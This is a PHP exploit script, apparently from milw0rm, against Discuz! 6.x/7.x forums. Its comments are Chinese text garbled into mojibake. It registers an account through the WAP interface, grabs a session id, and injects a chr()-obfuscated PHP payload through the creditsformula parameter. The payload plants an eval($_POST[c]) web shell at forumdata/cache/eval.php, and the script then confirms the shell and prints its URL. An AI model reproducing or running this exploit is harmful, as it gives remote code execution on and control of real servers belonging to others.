68 lines
No EOL
2.7 KiB
PHP
68 lines
No EOL
2.7 KiB
PHP
#!/usr/bin/php
|
||
<?php
|
||
/**
|
||
* Discuz! 6.x/7.x SODB-2008-13 Exp
|
||
* By www.80vul.com
|
||
* 文件ä¸æ³¨é‡Šçš„å˜é‡å€¼è¯·è‡ªè¡Œä¿®æ”¹
|
||
*/
|
||
$host = 'www.80vul.com';
|
||
// æœåŠ¡å™¨åŸŸå或IP
|
||
$path = '/discuz/';
|
||
// 程åºæ‰€åœ¨çš„路径
|
||
$key = 0;
|
||
// 上é¢çš„å˜é‡ç¼–辑好åŽï¼Œè¯·å°†æ¤å¤„的值改为1
|
||
|
||
if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
|
||
exit("专业点好ä¸,先看看里é¢çš„注释 -,-\n");
|
||
|
||
error_reporting(7);
|
||
ini_set('max_execution_time', 0);
|
||
|
||
$key = time();
|
||
$cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
|
||
$resp = send();
|
||
|
||
preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);
|
||
|
||
if (!$sid)
|
||
exit("哦,大概是没有开å¯WAPæ³¨å†Œå§ -,-\n");
|
||
|
||
$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
|
||
send();
|
||
|
||
$shell = 'http://'.$host.$path.'forumdata/cache/eval.php';
|
||
|
||
if (file_get_contents($shell) == '80vul')
|
||
exit("好了,åŽ»çœ‹çœ‹ä½ çš„WebShellå§:\t$shell\n里é¢çš„代ç 是:\t<?eval(\$_POST[c])?>\nåˆ«å‘Šè¯‰æˆ‘ä½ ä¸ä¼šç”¨ -,-\n");
|
||
else
|
||
exit("å—¯,大概是该网站ä¸å˜åœ¨æ¼æ´ž,æ¢ä¸€ä¸ªå§ -,-\n");
|
||
|
||
function send()
|
||
{
|
||
global $host, $path, $url, $cmd;
|
||
|
||
$data = "POST ".$path."wap/index.php HTTP/1.1\r\n";
|
||
$data .= "Accept: */*\r\n";
|
||
$data .= "Accept-Language: zh-cn\r\n";
|
||
$data .= "Referer: http://$host$path\r\n";
|
||
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
||
$data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
|
||
$data .= "Host: $host\r\n";
|
||
$data .= "Connection: Close\r\n";
|
||
$data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
|
||
$data .= $cmd;
|
||
|
||
$fp = fsockopen($host, 80);
|
||
fputs($fp, $data);
|
||
|
||
$resp = '';
|
||
|
||
while ($fp && !feof($fp))
|
||
$resp .= fread($fp, 1024);
|
||
|
||
return $resp;
|
||
}
|
||
|
||
?>
|
||
|
||
# milw0rm.com [2008-11-14]
|